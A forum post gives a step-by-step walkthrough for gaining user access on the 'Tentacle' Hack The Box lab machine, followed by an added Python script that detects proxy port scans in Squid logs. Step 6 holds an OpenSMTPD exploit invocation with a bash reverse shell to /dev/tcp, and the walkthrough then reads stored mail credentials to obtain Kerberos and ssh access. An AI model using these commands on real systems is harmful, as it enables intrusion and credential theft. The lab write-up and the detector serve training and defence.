TUTORIAL Tutorial Get user Tentacle hard machine
by sami92 - March 07, 2021 at 08:48 PM
#1
user:
    1. Scan for subdomains with dnsenum
        - perl dnsenum.pl --threads 64 --dnsserver 10.10.10.224 -f /opt/DICTIONARY/SecLists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
            ns.realcorp.htb. 259200 IN A 10.197.243.77
            proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
            ns.realcorp.htb. 259200 IN A 10.197.243.77
            wpad.realcorp.htb. 259200 IN A 10.197.243.31
    2. Configure proxychains with the corresponding subdomains identified
        - nano /etc/proxychains4.conf
            * http 10.10.10.224 3128
            * http 127.0.0.1 3128
            * http 10.197.243.77 3128
    3. Start scans on the identified subdomains
        - proxychains4 nmap -sT -Pn 10.197.243.31
        - Add new settings to /etc/hosts
            * 10.197.243.31 wpad.realcorp.htb
    4. Start autodiscover with dirsearch for wpad.realcorp.htb
        - sudo proxychains4 /opt/TOOLS/dirsearch/dirsearch.py -w /opt/DICTIONARY/SecLists/Discovery/Web-Content/raft-small-files-lowercase.txt -e dat -f -t 20 -u http://wpad.realcorp.htb
            * /wpad.dat 200
    5. With the content of wpad.dat, new network addresses are identified; scan them and verify the active IPs
        - proxychains4 nmap -sP 10.241.251.0/24
        - an OpenSMTPD service is identified at 10.241.251.113
    6. Exploit the OpenSMTPD service
        - proxychains4 python3 getShell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.15.84/4444 <& 1"'
        - get user credentials at /home/j.nakazawa/.msmtprc
    7. Create a Kerberos ticket with the identified credentials and add new settings in /etc/hosts and /etc/krb5.conf
        - sudo apt install krb5-user
        - make sure you have only (10.10.10.224 srv01.realcorp.htb) in the /etc/hosts file
        - Add new settings in /etc/krb5.conf
            [libdefaults]
                default_realm = REALCORP.HTB
            [realms]
                REALCORP.HTB = {
                        kdc = 10.10.10.224
                }
            [domain_realm]
                .realcorp.htb = REALCORP.HTB

    8. Generate the ticket by entering the identified credentials
        - kinit j.nakazawa
        - klist
    9. Connect via ssh and get the flag
        - ssh [email protected]
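Added detection example, written for this thread and not part of sami92's post: the nmap -sT run through proxychains in step 3 turns into a burst of CONNECT tunnels in the Squid proxy's access.log, one per probed port, most of them failing. The script below parses such lines and flags a client whose tunnels fan out to many ports on one host or to many hosts within a short window. The native Squid log layout, the thresholds and the sample lines are assumptions I constructed.

```python
import re
from collections import defaultdict

# Squid native access.log layout (assumed; adjust the regex to your proxy's format):
#   timestamp elapsed client action/status bytes method target user hierarchy/peer type
LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<target>\S+)"
)

def parse_line(line):
    """Return (ts, client, method, host, port) from one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host, _, port = m["target"].rpartition(":")
    return float(m["ts"]), m["client"], m["method"], host, port

def find_scans(lines, window=60, host_threshold=10, port_threshold=8):
    """Flag clients whose CONNECT tunnels inside one `window`-second bucket reach many distinct
    hosts (sweep) or many distinct ports on one host (port scan). Denied and failed tunnels
    count too: a scanner mostly touches closed ports, so filtering on status 200 would miss it."""
    buckets = defaultdict(lambda: defaultdict(set))  # (client, bucket) -> host -> {ports}
    for line in lines:
        ev = parse_line(line)
        if ev and ev[2] == "CONNECT":  # only tunnels, not ordinary GET/POST traffic
            ts, client, _, host, port = ev
            buckets[(client, int(ts // window))][host].add(port)
    alerts = []
    for (client, _), hosts in buckets.items():
        if len(hosts) >= host_threshold:
            alerts.append((client, "sweep", str(len(hosts))))
        for host, ports in hosts.items():
            if len(ports) >= port_threshold:
                alerts.append((client, "port_scan", host))
    return alerts

# Constructed sample: one client opens tunnels to eight ports on one host within seconds
# (what nmap -sT over an HTTP proxy looks like); another client fetches wpad.dat normally.
SAMPLE_LOG = [
    "1615147700.100    12 10.10.14.5 TCP_MISS/200 1234 GET http://wpad.realcorp.htb/wpad.dat - HIER_DIRECT/10.197.243.31 -",
] + [
    f"1615147701.{i}00     5 10.10.15.84 TCP_MISS/503 0 CONNECT 10.197.243.31:{p} - HIER_DIRECT/10.197.243.31 -"
    for i, p in enumerate((21, 22, 23, 25, 80, 110, 139, 445))
]

def scan_alerts():
    """Run the detector over the constructed sample; returns one port_scan alert."""
    return find_scans(SAMPLE_LOG)
```

Point the script at a real access.log (one line per list element) and tune the thresholds to your environment's normal CONNECT fan-out.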
#2
nice one - thanks for this